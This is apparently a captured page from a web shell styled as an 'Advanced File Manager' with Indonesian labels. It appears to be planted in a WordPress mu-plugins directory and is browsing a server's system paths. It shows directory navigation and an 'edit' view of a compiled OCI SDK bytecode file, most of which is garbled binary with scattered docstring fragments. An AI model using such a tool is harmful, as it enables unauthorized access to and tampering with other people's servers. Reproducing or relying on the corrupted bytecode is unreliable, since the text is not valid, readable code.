📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
container_engine
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/container_engine/models/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: addon_versions.cpython-39.pyc
a ���fW � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdd� Ze dd � �Z e jd d � �Z e dd� �Zejd d� �Ze dd� �Z e jdd� �Z e dd� �Zejdd� �Ze dd� �Zejdd� �Zdd� Zdd� Zdd� ZdS )� AddonVersionsz= The properties that define a work request resource. �ACTIVE� DEPRECATED�PREVIEW�RECALLEDc K sF dddddd�| _ ddddd d�| _d | _d | _d | _d | _d | _d S )a Initializes a new AddonVersions object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param status: The value to assign to the status property of this AddonVersions. Allowed values for this property are: "ACTIVE", "DEPRECATED", "PREVIEW", "RECALLED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type status: str :param version_number: The value to assign to the version_number property of this AddonVersions. :type version_number: str :param description: The value to assign to the description property of this AddonVersions. :type description: str :param kubernetes_version_filters: The value to assign to the kubernetes_version_filters property of this AddonVersions. :type kubernetes_version_filters: oci.container_engine.models.KubernetesVersionsFilters :param configurations: The value to assign to the configurations property of this AddonVersions. :type configurations: list[oci.container_engine.models.AddonVersionConfiguration] �strZKubernetesVersionsFilterszlist[AddonVersionConfiguration])�status�version_number�description�kubernetes_version_filters�configurationsr Z versionNumberr ZkubernetesVersionFiltersr N)Z swagger_typesZ attribute_map�_status�_version_number�_description�_kubernetes_version_filters�_configurations)�self�kwargs� r �N/usr/lib/python3.9/site-packages/oci/container_engine/models/addon_versions.py�__init__"